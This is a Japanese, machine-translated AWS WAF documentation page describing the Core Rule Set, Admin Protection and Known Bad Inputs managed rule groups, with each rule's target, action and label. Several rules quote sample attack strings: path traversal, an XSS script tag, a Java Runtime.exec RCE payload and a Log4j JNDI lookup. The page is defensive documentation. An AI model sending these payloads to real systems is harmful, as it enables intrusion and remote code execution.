ベースラインルールグループ - AWS WAF、 AWS Firewall ManagerAWS Shield Advanced、および AWS Shield ネットワークセキュリティディレクター
コアルールセット (CRS)管理者保護既知の不正な入力

の新しいコンソールエクスペリエンスの紹介 AWS WAF

更新されたエクスペリエンスを使用して、 コンソールの任意の場所で AWS WAF 機能にアクセスできるようになりました。詳細については、「更新されたコンソールエクスペリエンスの使用」を参照してください。

翻訳は機械翻訳により提供されています。提供された翻訳内容と英語版の間で齟齬、不一致または矛盾がある場合、英語版が優先します。

ベースラインルールグループ

ベースラインマネージドルールグループは、さまざまな一般的な脅威に対する一般的な保護を提供します。これらのルールグループを 1 つ以上選択して、リソースのベースライン保護を確立します。

コアルールセット (CRS) マネージドルールグループ

VendorName: AWS、名前: AWSManagedRulesCommonRuleSet、WCU: 700

注記

このドキュメントでは、このマネージドルールグループの最新の静的バージョンリリースについて説明します。バージョンの変更は、 の変更ログにレポートされますAWS マネージドルールの変更ログ。他のバージョンについては、 API コマンド DescribeManagedRuleGroup を使用します。

AWS マネージドルールルールのルールグループでルール用に公開する情報は、ルールを回避するために必要なものを不正なアクターに与えることなく、ルールを使用するために必要なものを提供することを目的としています。

ここで見つけた情報よりも詳細な情報が必要な場合は、 AWS サポート センターにお問い合わせください。

コアルールセット (CRS) ルールグループには、ウェブアプリケーションに一般的に適用可能なルールが含まれています。これにより、OWASP Top 10 などの OWASP の出版物に記載されている、リスクが高く一般的に発生するいくつかの脆弱性を含む、さまざまな脆弱性の悪用に対する保護が提供されます。 AWS WAF ユースケースには、このルールグループの使用を検討してください。

このマネージドルールグループは、評価するウェブリクエストにラベルを追加します。これは、保護パックまたはウェブ ACL でこのルールグループの後に実行されるルールで使用できます。 AWS WAF はAmazon CloudWatch メトリクスにもラベルを記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストのラベル付け」および「ラベルメトリクスとディメンション」を参照してください。

ルール名 説明とラベル
NoUserAgent_HEADER

HTTP User-Agent ヘッダーが欠落しているリクエストを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:NoUserAgent_Header
UserAgent_BadBots_HEADER

リクエストが不正なボットであることを示す一般的な User-Agent ヘッダー値を検査します。パターンの例には、nessusnmap などがあります。ボット管理については、「AWS WAF Bot Control ルールグループ」も参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:BadBots_Header
SizeRestrictions_QUERYSTRING

2,048 バイトを超える URI クエリ文字列を検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString
SizeRestrictions_Cookie_HEADER

10,240 バイトを超える cookie ヘッダーを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header
SizeRestrictions_BODY

8 KB (8,192 バイト) を超えるリクエストボディを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_Body
SizeRestrictions_URIPATH

1,024 バイトを超える URI パスを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath
EC2MetaDataSSRF_BODY

リクエストボディから Amazon EC2 メタデータを盗み出す試みがないかを検査します。

警告

このルールは、保護パックまたはウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer および の場合 AWS AppSync、制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB であり、保護パックまたはウェブ ACL 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body
EC2MetaDataSSRF_COOKIE

リクエスト cookie から Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie
EC2MetaDataSSRF_URIPATH

リクエスト URI パスから Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath
EC2MetaDataSSRF_QUERYARGUMENTS

リクエストクエリ引数から Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments
GenericLFI_QUERYARGUMENTS

クエリ引数に、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments
GenericLFI_URIPATH

URI パスに、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_URIPath
GenericLFI_BODY

リクエストボディに、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

警告

このルールは、保護パックまたはウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer および の場合 AWS AppSync、制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB であり、保護パックまたはウェブ ACL 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_Body
RestrictedExtensions_URIPATH

読み取りや実行が安全でないシステムファイルの拡張子が URI パスに含まれているリクエストを検査します。パターンの例には、.log.ini などの拡張子があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath
RestrictedExtensions_QUERYARGUMENTS

クエリ引数に、読み取りや実行が安全でないシステムファイル拡張子が含まれているリクエストを検査します。パターンの例には、.log.ini などの拡張子があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments
GenericRFI_QUERYARGUMENTS

IPv4 アドレスを含む URL を埋め込むことにより、Web アプリケーションでRFI (リモートファイルインクルード) を悪用しようとする試みに対して、すべてのクエリパラメーターの値を検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments
GenericRFI_BODY

IPv4 アドレスを含む URL を埋め込むことにより、ウェブアプリケーションの RFI (リモートファイルインクルージョン) を悪用しようとする試行に対してリクエストボディを検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

警告

このルールは、保護パックまたはウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer および の場合 AWS AppSync、制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB であり、保護パックまたはウェブ ACL 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericRFI_Body
GenericRFI_URIPATH

IPv4 アドレスを含む URL を埋め込むことにより、ウェブアプリケーションの RFI (リモートファイルインクルージョン) を悪用しようとする試行に対してURI パスを検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericRFI_URIPath
CrossSiteScripting_COOKIE

組み込み を使用して、一般的なクロスサイトスクリプティング (XSS) パターンの Cookie ヘッダーの値を検査します AWS WAF クロスサイトスクリプティング攻撃ルールステートメント。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

AWS WAF ログのルール一致の詳細は、このルールグループのバージョン 2.0 では入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie
CrossSiteScripting_QUERYARGUMENTS

組み込み を使用して、一般的なクロスサイトスクリプティング (XSS) パターンのクエリ引数の値を検査します AWS WAF クロスサイトスクリプティング攻撃ルールステートメント。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

AWS WAF ログのルール一致の詳細は、このルールグループのバージョン 2.0 では入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments
CrossSiteScripting_BODY

組み込み を使用して、一般的なクロスサイトスクリプティング (XSS) パターンのリクエストボディを検査します AWS WAF クロスサイトスクリプティング攻撃ルールステートメント。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

AWS WAF ログのルール一致の詳細は、このルールグループのバージョン 2.0 では入力されません。

警告

このルールは、保護パックまたはウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer および の場合 AWS AppSync、制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB であり、保護パックまたはウェブ ACL 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body
CrossSiteScripting_URIPATH

組み込み を使用して、一般的なクロスサイトスクリプティング (XSS) パターンの URI パスの値を検査します AWS WAF クロスサイトスクリプティング攻撃ルールステートメント。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

AWS WAF ログのルール一致の詳細は、このルールグループのバージョン 2.0 では入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath

管理者保護マネージドルールグループ

VendorName: AWS、名前: AWSManagedRulesAdminProtectionRuleSet、WCU: 100

注記

このドキュメントでは、このマネージドルールグループの最新の静的バージョンリリースについて説明します。バージョンの変更は、 の変更ログにレポートされますAWS マネージドルールの変更ログ。他のバージョンについては、 API コマンド DescribeManagedRuleGroup を使用します。

AWS マネージドルールルールのルールグループでルール用に公開する情報は、ルールを回避するために必要なものを不正なアクターに与えることなく、ルールを使用するために必要なものを提供することを目的としています。

ここで見つけた情報よりも詳細な情報が必要な場合は、 AWS サポート センターにお問い合わせください。

管理者保護ルールグループには、公開されている管理ページへの外部アクセスをブロックするためのルールが含まれています。これは、サードパーティーのソフトウェアを実行している場合や、悪意のあるアクターがアプリケーションへの管理アクセスを得るリスクを緩和したい場合に便利です。

このマネージドルールグループは、評価するウェブリクエストにラベルを追加します。これは、保護パックまたはウェブ ACL でこのルールグループの後に実行されるルールで使用できます。 AWS WAF はAmazon CloudWatch メトリクスにもラベルを記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストのラベル付け」および「ラベルメトリクスとディメンション」を参照してください。

ルール名 説明とラベル
AdminProtection_URIPATH

一般的にウェブサーバーまたはアプリケーションの管理用に確保されている URI パスの有無を検査します。パターンの例には、sqlmanager などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:admin-protection:AdminProtection_URIPath

既知の不正な入力マネージドルールグループ

VendorName: AWS、名前: AWSManagedRulesKnownBadInputsRuleSet、WCU: 200

注記

このドキュメントでは、このマネージドルールグループの最新の静的バージョンリリースについて説明します。バージョンの変更は、 の変更ログにレポートされますAWS マネージドルールの変更ログ。他のバージョンについては、 API コマンド DescribeManagedRuleGroup を使用します。

AWS マネージドルールルールのルールグループでルール用に公開する情報は、ルールを回避するために必要なものを不正なアクターに与えることなく、ルールを使用するために必要なものを提供することを目的としています。

ここに記載されている情報よりも詳細な情報が必要な場合は、 AWS サポート センターにお問い合わせください。

既知の不正な入力ルールグループには、無効であることがわかっており脆弱性の悪用または発見に関連するリクエストパターンをブロックするルールが含まれています。これにより、悪意のあるアクターが脆弱なアプリケーションを発見するリスクを緩和できます。

このマネージドルールグループは、評価するウェブリクエストにラベルを追加します。これは、保護パックまたはウェブ ACL でこのルールグループの後に実行されるルールで使用できます。 AWS WAF はAmazon CloudWatch メトリクスにもラベルを記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストのラベル付け」および「ラベルメトリクスとディメンション」を参照してください。

ルール名 説明とラベル
JavaDeserializationRCE_HEADER

HTTP リクエストヘッダーのキーと値に、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

警告

このルールは、リクエストヘッダーの最初の 8 KB または最初の 200 個のヘッダーのうち、いずれかの制限に先に達した方のみを検査し、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header

JavaDeserializationRCE_BODY

リクエスト本文で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

警告

このルールは、保護パックまたはウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer および の場合 AWS AppSync、制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB であり、保護パックまたはウェブ ACL 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body
JavaDeserializationRCE_URIPATH

リクエスト URI で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath
JavaDeserializationRCE_QUERYSTRING

リクエストクエリ文字列で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString
Host_localhost_HEADER

リクエストのホストヘッダーに、localhost を示すパターンがないかを検査します。パターンの例には、localhost などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header
PROPFIND_METHOD

リクエストの HTTP メソッドに、PROPFIND がないかを検査します。このメソッドは HEAD と同様ですが、XML オブジェクトを抽出しようとする点が異なります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Propfind_Method
ExploitablePaths_URIPATH

URI パスに、悪用可能なウェブアプリケーションパスにアクセスする試みがないかを検査します。パターンの例には、web-inf などのパスがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath
Log4JRCE_HEADER

リクエストヘッダーのキーと値に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

警告

このルールは、リクエストヘッダーの最初の 8 KB または最初の 200 個のヘッダーのうち、いずれかの制限に先に達した方のみを検査し、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header
Log4JRCE_QUERYSTRING

クエリ文字列に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString
Log4JRCE_BODY

本文に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

警告

このルールは、保護パックまたはウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer および の場合 AWS AppSync、制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB であり、保護パックまたはウェブ ACL 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのウェブリクエストコンポーネントのオーバーサイズ化 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body
Log4JRCE_URIPATH

URI パスに Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath